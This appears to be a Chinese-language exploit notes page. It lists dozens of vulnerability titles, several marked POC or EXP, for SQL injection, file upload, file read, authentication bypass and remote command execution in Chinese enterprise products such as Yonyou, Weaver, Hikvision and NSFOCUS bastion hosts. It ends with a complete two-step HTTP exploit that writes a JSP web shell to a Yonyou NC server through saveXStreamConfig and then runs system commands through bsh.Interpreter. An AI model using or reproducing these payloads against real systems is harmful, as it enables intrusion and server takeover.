Quan

Kuboard默认口令
宏景OA文件上传
有用畅捷通T+GetStoreWarehouseByStore RCE漏洞
金和OA 未授权

Coremail 邮件系统未授权访问获取管理员账密
Milesight VPN server.js 任意文件读取漏洞
Panel loadfile 后台文件读取漏洞
PigCMS action_flashUpload 任意文件上传漏洞
企业微信存在信息泄露
华天动力oa SQL注入
启明天钥安全网关前台sql注入
启明星辰-4A 统一安全管控平台 getMater 信息泄漏
广联达 Linkworks GetIMDictionarySQL 注入漏洞
泛微 Weaver E-Office9 前台文件包含
用友文件服务器认证绕过
红帆 oa 注入
绿盟 NF 下一代防火墙 任意文件上传漏洞
网御 ACM 上网行为管理系统bottomframe.cgi SQL 注入漏洞
金盘 微信管理平台 getsysteminfo 未授权访问漏洞
亿某通-电子文档平台-任意文件上传
某凌-OA-前台SQL注入
锐捷交换机 WEB 管理系统 EXCU_SHELL 信息泄露
科荣 AIO 管理系统存在文件读取漏洞
飞企互联 FE 业务协作平台 magePath 参数文件读取漏洞
用友GRP-U8存在信息泄露
nginx配置错误导致的路径穿越风险

大华智慧园区综合管理平台 searchJson SQL注入漏洞 POC
大华智慧园区综合管理平台 文件上传漏洞 POC
安恒明御运维审计与风险控制系统堡垒机任意用户注册
某盟 SAS堡垒机 Exec 远程命令执行漏洞 POC
泛微 E-Cology 某版本 SQL注入漏洞 POC
深信服 sxf-报表系统 版本有限制
用友时空KSOA PayBill SQL注入漏洞 POC
绿盟 SAS堡垒机 GetFile 任意文件读取漏洞 POC
绿盟 SAS堡垒机 local_user.php 任意用户登录漏洞 POC
蓝凌OA前台代码执行
密码在博客中有写

海康威视八大漏洞汇总包括一些默认密码等
海康威视综合安防平台后渗透利用工具 数据解密与用户账号密码替换
海康威视iVMS 综合安防前台任意文件上传
海康威视综合安防管理平台任意文件上传 POC&EXP直接拿EXP打，美滋滋
海康威视综合安防管理平台远程命令执行漏洞（Fastjson）
不出网的Fastjson利用
记一次海康AK凭证泄漏下的利用

本质看上去应该还是个文件上传
先上传：
POST /uapjs/jsinvoke/?action=invoke HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept: */*
Connection: Keep-Alive
Content-Length: 253
Content-Type: application/x-www-form-urlencoded

{"serviceName":"nc.itf.iufo.IBaseSPService","methodName":"saveXStreamConfig","parameterTypes":["java.lang.Object","java.lang.String"],"parameters":["${param.getClass().forName(param.error).newInstance().eval(param.cmd)}","webapps/nc_web/823780482.jsp"]}

再执行：
POST /823780482.jsp?error=bsh.Interpreter HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9
Connection: close
Host: 127.0.0.1
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Accept-Language: zh-CN,zh;q=0.9
Cookie: cookiets=1681785470496; JSESSIONID=33989F450B1EA57D4D3ED07A343770FF.server
If-None-Match: W/"1571-1589211696000"
If-Modified-Since: Mon, 11 May 2020 15:41:36 GMT
Content-Type: application/x-www-form-urlencoded
Content-Length: 98

cmd=org.apache.commons.io.IOUtils.toString(Runtime.getRuntime().exec("ipconfig").getInputStream())